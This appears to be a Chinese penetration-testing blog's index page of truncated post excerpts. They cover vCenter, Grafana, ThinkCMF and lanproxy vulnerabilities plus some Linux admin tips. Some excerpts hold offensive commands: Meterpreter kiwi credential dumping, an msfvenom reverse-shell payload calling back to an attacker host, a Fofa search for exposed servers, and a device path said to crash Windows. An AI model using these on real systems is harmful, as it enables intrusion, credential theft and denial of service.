摘要:
meterpreter kiwi命令大全 显示帮助信息 help kiwi creds_all:列举所有凭据 creds_kerberos:列举所有kerberos凭据 creds_msv:列举所有msv凭据 creds_ssp:列举所有ssp凭据 creds_tspkg:列举所有tspkg凭据 c 阅读全文
摘要:
9月11日-9月23日漏洞(来自补天) 1.深信服EDR某处命令执行漏洞,危害级别:危急 2.深信服SSL VPN 远程代码执行漏洞,危害级别:危急 3.绿盟UTS综合威胁探针信息泄露漏洞,危害级别:危急,官方已发布补丁 4.Apache DolphinScheduler远程代码执行漏洞(CVE-2 阅读全文
摘要:
查看程序对应的进程号: ps -ef | grep 进程名字 查看端口号所占用的进程: netstat -nltp | grep 端口 或者 netstat -anp | grep 端口 杀死进程 kill pid 阅读全文
摘要:
生成不同类型的shell Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows 阅读全文
摘要:
前言 vSphere Client(HTML5)在 vCenter Server 插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放 443 端口的服务器向 vCenter Server 发送精心构造的请求,从而在服务器上写入 webshell,最终造成远程任意代码执行。在 CVE-2021 阅读全文
摘要:
1.使用root权限新建用户: useradd <username> 2.给添加的用户指定密码 passwd <username> 3.使用刚刚创建好的用户登录 阅读全文
摘要:
0x01 漏洞描述 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理系统框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应 阅读全文
摘要:
前言 Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 Grafana 3.0.1版本至7.0.1版本中的avatar功能存在远程代码执行漏洞,该漏洞源于不正确的访问控制。远程攻击者可利用 阅读全文
摘要:
说多了都是泪 先说一下这两个的功能,一个可以令电脑蓝屏,真的无情啊。一个可以破坏电脑NTLM格式硬盘。。这个坑我也踩了,不过重启之后也没啥异常。 \\.\globalroot\device\condrv\kernelconnect 浏览器访问电脑直接蓝屏,毫不解释,我**,被同事坑的时候的还以为是访 阅读全文
摘要:
漏洞描述 lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具。攻击者通过构造恶意请求,可直接获取到lanproxy配置文件,从而登录lanproxy管理后台进入内网。 影响版本 lanproxy 0.1 Fofa header= "Server: LPS-0.1" 漏洞利用 读取 阅读全文